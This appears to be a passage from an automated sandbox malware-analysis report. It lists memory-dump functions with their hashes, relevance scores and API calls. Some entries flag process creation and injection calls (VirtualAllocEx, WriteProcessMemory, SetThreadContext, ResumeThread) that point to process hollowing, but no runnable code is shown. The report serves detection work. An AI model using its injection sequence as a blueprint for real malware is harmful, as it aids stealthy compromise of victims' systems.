                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1778838933-0
                                                                                                                                                      • Opcode ID: 74ff1cd3719323269f2dc15db282962fdefbc04bc399b0202ffeec13d208dfff
                                                                                                                                                      • Instruction ID: 17c885789b2ded417c8ab56b0dfa0a7ce793839a44eab136c033096ca2e28408
                                                                                                                                                      • Opcode Fuzzy Hash: 74ff1cd3719323269f2dc15db282962fdefbc04bc399b0202ffeec13d208dfff
                                                                                                                                                      • Instruction Fuzzy Hash: 394165B9D042589FCF10CFA9D984ADEFBB1BB19310F20942AE814B7210D375A945CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003AA380, Relevance: .2, Instructions: 202COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4fb4e9ab3d5468151af366d5a45d4bbe9d2c057f54725c17f4320a0d9883252a
                                                                                                                                                      • Instruction ID: 3f982a9cb519750d78dd79a1123173e98981fbeb7dd1e9599145904febc435ba
                                                                                                                                                      • Opcode Fuzzy Hash: 4fb4e9ab3d5468151af366d5a45d4bbe9d2c057f54725c17f4320a0d9883252a
                                                                                                                                                      • Instruction Fuzzy Hash: E991CE71E00628CFDB15CFAAC8447DEBBF2EF8A300F1084A9D509AB254EB745A85CF41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A2D48, Relevance: .2, Instructions: 179COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b03dda7113a5a93fc526f985fb9b2d94bc60faaced49c8f962ad9876d8170280
                                                                                                                                                      • Instruction ID: da037abf124745d9961dd949c1ca3dece917a8fe996aa6be1327e209930aa29d
                                                                                                                                                      • Opcode Fuzzy Hash: b03dda7113a5a93fc526f985fb9b2d94bc60faaced49c8f962ad9876d8170280
                                                                                                                                                      • Instruction Fuzzy Hash: 7371F374E012099FDB08CFA9D98499EFBF6FF89300F14842AD419AB764EB349A41CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A2D58, Relevance: .2, Instructions: 176COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3ff140207be64c5089929253fcad1f76cfc1fd288868fba542de7dc21b314d8e
                                                                                                                                                      • Instruction ID: b6fa5e46b6efb4cdf42088f077b7791001ead844ae3cc63bf4df28d20ca179a1
                                                                                                                                                      • Opcode Fuzzy Hash: 3ff140207be64c5089929253fcad1f76cfc1fd288868fba542de7dc21b314d8e
                                                                                                                                                      • Instruction Fuzzy Hash: 5271D374E012099FDB08DFA9D94499EFBF6FF89300F14842AE419AB764E7349941CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A38B8, Relevance: .1, Instructions: 141COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 03389c8678d6afbed9a0c5334c15713fba482d1e87f0ebda6b4199cebe2890e5
                                                                                                                                                      • Instruction ID: db7740377680fa829c853e8ceaf9bceb6afcf7532ef8b989801d36f29770edc3
                                                                                                                                                      • Opcode Fuzzy Hash: 03389c8678d6afbed9a0c5334c15713fba482d1e87f0ebda6b4199cebe2890e5
                                                                                                                                                      • Instruction Fuzzy Hash: 4551E270E01219CFCB44CFA9D8846DEFBF6EF89301F20842AE419B7214D7749A428F51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0471, Relevance: .1, Instructions: 138COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: df17159bca0a497b526b3a79e6966fded045d2aca7ac674566cfa23c1b688dd8
                                                                                                                                                      • Instruction ID: c6ca0b2c787b24c7694f67c37cde7b8431c6ccf5e26b5ded9127f4e6df243a1e
                                                                                                                                                      • Opcode Fuzzy Hash: df17159bca0a497b526b3a79e6966fded045d2aca7ac674566cfa23c1b688dd8
                                                                                                                                                      • Instruction Fuzzy Hash: 715117B4D04248DFCB49DFA5E9986EDBBB6FB8A301F208429D806B7664D7345982CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0910, Relevance: .1, Instructions: 136COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0f76459d9451f6d6241fdd0b05574595874291276ef78011cdfc7dfbfb8ad12c
                                                                                                                                                      • Instruction ID: 37d1b1a329531b8236bcf48703d17981cdcfe6ee5ee5e9bfa136977e015d0e20
                                                                                                                                                      • Opcode Fuzzy Hash: 0f76459d9451f6d6241fdd0b05574595874291276ef78011cdfc7dfbfb8ad12c
                                                                                                                                                      • Instruction Fuzzy Hash: 5051E271E10619CBCB18CFE9C84059DFBB6FF89300F20862AD41AB7624EB306992CF40
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0901, Relevance: .1, Instructions: 133COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f4f80fa93334b8861e7fdf9ed7ed3cf318a392d7bd31e504fad41751868326df
                                                                                                                                                      • Instruction ID: 74dd58ea1155d53fcf1438e66dc63cb64e74c2a118f7c372971fdbc0573f97d5
                                                                                                                                                      • Opcode Fuzzy Hash: f4f80fa93334b8861e7fdf9ed7ed3cf318a392d7bd31e504fad41751868326df
                                                                                                                                                      • Instruction Fuzzy Hash: F4510871E14749CBDB59CFA9D84059DFBB6FF89300F24862AD41AB7625E7306992CF00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A1CB0, Relevance: .1, Instructions: 80COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 393e3aa62636c0c257742f4ef0c5c5005f2033a2dc1ddece445a85605d899530
                                                                                                                                                      • Instruction ID: cfe4023cba0ae3ffdf5d9d0dade9752fd93d5702cc8f6053fcf16ff2874dd116
                                                                                                                                                      • Opcode Fuzzy Hash: 393e3aa62636c0c257742f4ef0c5c5005f2033a2dc1ddece445a85605d899530
                                                                                                                                                      • Instruction Fuzzy Hash: D321A170E15608EFD718CFF5C5406AEFBBBEFCA310F24E4A98409A7254D7349A419B44
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0443DF58, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0443E21F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                      • Opcode ID: 18ae2a8920b817f16eac3fd164268dcc41ddca3df57f7875a6d7e1283c84c3e4
                                                                                                                                                      • Instruction ID: d0175a3ab81b39eb5d4d5d1eb4968ce86d2e0800b5b1b95a234daec4f81014c9
                                                                                                                                                      • Opcode Fuzzy Hash: 18ae2a8920b817f16eac3fd164268dcc41ddca3df57f7875a6d7e1283c84c3e4
                                                                                                                                                      • Instruction Fuzzy Hash: 90C12470D0122D8FDF20CFA4C844BEEBBB1BB49305F1095AAD859B7240DB74AA85CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0443DB40, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0443DC13
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                      • Opcode ID: 37579d762ac784f8d8e98680b9a9694bf4662d7f20f10cbf2bf85af3b46d4cf9
                                                                                                                                                      • Instruction ID: 3279b03af8ba5f654c7d208a19b2377f39a35432d44f2d0ec48f74c4350cdd3a
                                                                                                                                                      • Opcode Fuzzy Hash: 37579d762ac784f8d8e98680b9a9694bf4662d7f20f10cbf2bf85af3b46d4cf9
                                                                                                                                                      • Instruction Fuzzy Hash: 6A4198B4D052589FCF00CFA9D984AEEFBF1BB49314F24942AE819B7210D774AA45CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0443DCC8, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0443DD7A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                      • Opcode ID: f49b72a25ea1bb28d89c4dbc5fb484a91f270d5d0637095ad59ae6e160925557
                                                                                                                                                      • Instruction ID: 6100a3edf41387d1d00da5897c459a23ae1d3a01b77e845a816fcd8be62cd756
                                                                                                                                                      • Opcode Fuzzy Hash: f49b72a25ea1bb28d89c4dbc5fb484a91f270d5d0637095ad59ae6e160925557
                                                                                                                                                      • Instruction Fuzzy Hash: A34196B4D04258DFCF10CFAAD884AEEFBB5BB09310F10942AE815B7200D735A946CF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0443D9F0, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0443DA9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: a74032f0f99a878c5035c98b9ce0466dc03f21b35fa44c525f0ef85d40ef108a
                                                                                                                                                      • Instruction ID: c23c37b3f4360bce21cc15311d479cb30e92ee865c7864a63f6210d401267bc9
                                                                                                                                                      • Opcode Fuzzy Hash: a74032f0f99a878c5035c98b9ce0466dc03f21b35fa44c525f0ef85d40ef108a
                                                                                                                                                      • Instruction Fuzzy Hash: 4D3176B8D04258DBCF10CFA9D984AEEFBB5BB59310F10942AE815B7210D775A902CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0443D808, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0443D8B7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                      • Opcode ID: 238b3e58baf917c9ca6551546a0a80a64bb8429bee41a9f364ba8925327d4e81
                                                                                                                                                      • Instruction ID: 507788a00eb2deb26d38d9d28c4df0171ba893692147edad5bf9ea757aec8a81
                                                                                                                                                      • Opcode Fuzzy Hash: 238b3e58baf917c9ca6551546a0a80a64bb8429bee41a9f364ba8925327d4e81
                                                                                                                                                      • Instruction Fuzzy Hash: CD31A9B4D01218DFDB14CFAAD884AEEFBB1BF49314F24842AE415B7240D778A945CFA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0178, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 003A15E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugOutputString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1166629820-0
                                                                                                                                                      • Opcode ID: 363833af13f89f2605cd36d481912d5792a9dd667ae9bf895a89253944668171
                                                                                                                                                      • Instruction ID: bf4bfada68ba85bdfe98a5cdc855e68b49dac13c7271612dbe75d807614c9e2a
                                                                                                                                                      • Opcode Fuzzy Hash: 363833af13f89f2605cd36d481912d5792a9dd667ae9bf895a89253944668171
                                                                                                                                                      • Instruction Fuzzy Hash: 1B31ACB4D042089FCB14CFA9D484ADEFBF5EB4A310F14846AE815B7310D774A941CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A1540, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • OutputDebugStringW.KERNELBASE(?), ref: 003A15E2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugOutputString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1166629820-0
                                                                                                                                                      • Opcode ID: ddc45de420eb8b8093612f530ca0ae67e5e746fd28d21bdabfbd959445e1a3cf
                                                                                                                                                      • Instruction ID: 754a1cd0ae6d652908ad993ce46ac21cd778b5023a071888afc6a2ae792a2317
                                                                                                                                                      • Opcode Fuzzy Hash: ddc45de420eb8b8093612f530ca0ae67e5e746fd28d21bdabfbd959445e1a3cf
                                                                                                                                                      • Instruction Fuzzy Hash: 3F31A8B4D042589FCB14CFA9D484AEEFBF1EF4A314F24806AE819B7220D774A945CF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0443D6C0, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ResumeThread.KERNELBASE(?), ref: 0443D73E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2191480812.0000000004430000.00000040.00000001.sdmp, Offset: 04430000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                      • Opcode ID: 0b4bb665e7719609d7e42870d7e784464d66a5eda76158b4397e29063c87e1bb
                                                                                                                                                      • Instruction ID: 613efc9b90761eaa7290985a9ec4fc1246a9880d56629039c72d2f4420109426
                                                                                                                                                      • Opcode Fuzzy Hash: 0b4bb665e7719609d7e42870d7e784464d66a5eda76158b4397e29063c87e1bb
                                                                                                                                                      • Instruction Fuzzy Hash: DE3189B4D052189FCF14CFA9D884AEEFBB5AF49314F24982AE815B7300D775A901CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A1639, Relevance: 1.3, APIs: 1, Instructions: 74COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 003A16BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 20f1c19aaf08967ec9c43063ea43112f1f89a7d790a44b4baab044512b50c80e
                                                                                                                                                      • Instruction ID: b2191a6f046bb4e49d69c1f67726e31dfde6a4eb446fb37d43b6a95f3665b3ea
                                                                                                                                                      • Opcode Fuzzy Hash: 20f1c19aaf08967ec9c43063ea43112f1f89a7d790a44b4baab044512b50c80e
                                                                                                                                                      • Instruction Fuzzy Hash: E731CBB8D04258DFCB10CFA9D884AEEFBF0EB0A310F24945AE815B3250C334AA45CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 003A0190, Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 003A16BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188738179.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 5a5c203b3025950f53c818ffb79adff6050d04b2ed46be112af6645ae23da69f
                                                                                                                                                      • Instruction ID: a33b3313e6e6f1a6a617930c90d9238d86e6c8c40b3422f75c58b4945ca3bd12
                                                                                                                                                      • Opcode Fuzzy Hash: 5a5c203b3025950f53c818ffb79adff6050d04b2ed46be112af6645ae23da69f
                                                                                                                                                      • Instruction Fuzzy Hash: 9331ABB8D04218DFCB10CFA9D484AEEFBF4EB4A314F24945AE815B3210C374A945CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890854, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .
                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                      • Opcode ID: 302fba1d5f484ae6689e7a74cbac337591079b6998a90fa033a61b40f755ba54
                                                                                                                                                      • Instruction ID: a71266fb2cac113cd96dc978908046c4d9d6d00f7263b570e4ca56438b39d221
                                                                                                                                                      • Opcode Fuzzy Hash: 302fba1d5f484ae6689e7a74cbac337591079b6998a90fa033a61b40f755ba54
                                                                                                                                                      • Instruction Fuzzy Hash: DC11BD75904228CFCB20AF60D9487DCBBF1FB19319F1885EAD449A7251D7348AD8DF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890D6F, Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .
                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                      • Opcode ID: f92bc8ede523162e003153a86f8d05123b62d30981a4500f9c07fe7b5548d246
                                                                                                                                                      • Instruction ID: 1899287fab98b7bfa7c88caa765754dd35e4e1ccad777a313f7d53846f362e77
                                                                                                                                                      • Opcode Fuzzy Hash: f92bc8ede523162e003153a86f8d05123b62d30981a4500f9c07fe7b5548d246
                                                                                                                                                      • Instruction Fuzzy Hash: 4511EB71908228CFCB20AFA4C9483CCBBB0FB19319F1880EAC049A7241C7348AD4DF45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890645, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: !
                                                                                                                                                      • API String ID: 0-2657877971
                                                                                                                                                      • Opcode ID: de6e234e76b17db203064e7a5142c15a4ef4bf00538fc5244f0a934d95c8a154
                                                                                                                                                      • Instruction ID: 14a3bc9d9f5fadadb938e7d5b13ba2b3d3a8c89a1e4b52ecc3eeb5d95c191343
                                                                                                                                                      • Opcode Fuzzy Hash: de6e234e76b17db203064e7a5142c15a4ef4bf00538fc5244f0a934d95c8a154
                                                                                                                                                      • Instruction Fuzzy Hash: 31F0DF76908218CFCB10DFA4C980BEDB7F8FB58318F144096E509E7281C735AA86CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890413, Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: +
                                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                                      • Opcode ID: 6f5512824730288b55690f5c3eab08eb9ecfb9ffad664ef85556d1a511e96885
                                                                                                                                                      • Instruction ID: 083c147de20d1f345a3af5cf824133df7e7b920a94cfba0906b2d2255828d3bc
                                                                                                                                                      • Opcode Fuzzy Hash: 6f5512824730288b55690f5c3eab08eb9ecfb9ffad664ef85556d1a511e96885
                                                                                                                                                      • Instruction Fuzzy Hash: 81F09B75908228CFDF609FA0D884BDDBBB1FB18324F24009AE549AB2A0C7355AD4DF04
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188684239.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 72f59f35a830daaa5bd4d27b68e304c0d45a0cc894bbc561f04d148bf2379414
                                                                                                                                                      • Instruction ID: 562da999f177c106a6eca4b46237f347f7e6920a4e257dbcc833e132ca13197d
                                                                                                                                                      • Opcode Fuzzy Hash: 72f59f35a830daaa5bd4d27b68e304c0d45a0cc894bbc561f04d148bf2379414
                                                                                                                                                      • Instruction Fuzzy Hash: 9721F275604208DFDB15DF64E884B26BBB5EF84324F24C96DE80D4B246C736D847CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890C58, Relevance: .1, Instructions: 68COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6957995e4bb3c8fe030b8e970b87be2548ebbdb8313d25251e52ccebd54fdbd7
                                                                                                                                                      • Instruction ID: 654a5a3430f48e8f3553d70148993dfe8ca2cb5ef3a40f2f41607897fecf0de3
                                                                                                                                                      • Opcode Fuzzy Hash: 6957995e4bb3c8fe030b8e970b87be2548ebbdb8313d25251e52ccebd54fdbd7
                                                                                                                                                      • Instruction Fuzzy Hash: FE319A709052288FEF60EF64C988BD9B7B1FB19318F1844EAD448A7291DB759ED4CF41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188684239.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8dc63af913cac10ee0cdd74758e467d310406078d7c65565b4d8c0d8dbd75274
                                                                                                                                                      • Instruction ID: 13a8e45bf4a859b3e6f8ef626f834ad4d1f8dffdd18f702471ffbf3e50a1dba6
                                                                                                                                                      • Opcode Fuzzy Hash: 8dc63af913cac10ee0cdd74758e467d310406078d7c65565b4d8c0d8dbd75274
                                                                                                                                                      • Instruction Fuzzy Hash: F8218B755093848FCB12CF20D994B15BF71EF46314F28C5EAD8498B2A7C33AD80ACB62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00890A52, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a60863127e0ee2c7102af594c0450997b6b4404f2639a12e7cc8a0443a5307eb
                                                                                                                                                      • Instruction ID: 95d2df273c1747a1a0098dd10677be073a0d97829ea7112199ae32d4bc539b88
                                                                                                                                                      • Opcode Fuzzy Hash: a60863127e0ee2c7102af594c0450997b6b4404f2639a12e7cc8a0443a5307eb
                                                                                                                                                      • Instruction Fuzzy Hash: A92198749052288FCB60EF24D988BEDBBB5BB59315F1445EAD40AA7291DB309EC4DF04
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 008913E7, Relevance: .0, Instructions: 43COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000004.00000002.2188863224.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 270eeda057235de038e297ebc3dd78c4ef4841226bf0dc66b9af98aeccc9b1fa
